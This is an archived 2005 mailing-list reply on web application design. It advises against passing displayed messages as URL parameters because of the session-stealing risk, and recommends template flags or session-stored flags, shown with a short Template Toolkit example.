On Wed, Feb 16, 2005 at 09:00:51AM -0500, William McKee wrote:
> This means that you could pass that message as a paramter when you do
> the redirect.
THat's a bad idea, IMNSHO. Never pass anything as a parameter that will
get displayed. That would open you up to attacks.
I could send people a link to your site that would email me all sorts of
info (including cookies, which would let me attack their session). And
anything I did would appear to be coming from your site.
What we do here is use flags. (In my case, a hashref exported to my
template, so my template can say (I'm using Template Toolkit, but this
works with any real templating system such as HTML::Template as well)
[% IF Notes.Username %]
Please enter your username/password:
[% END %]
In addition to protecting the site from one form of attack, it leaves
the control of the message itself to the designer where it belongs.
To try to answer your more general question: You can use the redirect
suggestion with the flags (as nothing passed is displayed), or you can
store the flags in the session on a per application basis. Each app can
"erase" any flags for it after each read, assuming none of your flags
last more than one action.
--
SwiftOne / Brett Sanger
suppressed
---------------------------------------------------------------------
Web Archive: http://www.mail-archive.com/suppressed/
http://marc.theaimsgroup.com/?l=cgiapp&r=1&w=2
To unsubscribe, e-mail: suppressed
For additional commands, e-mail: suppressed
Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.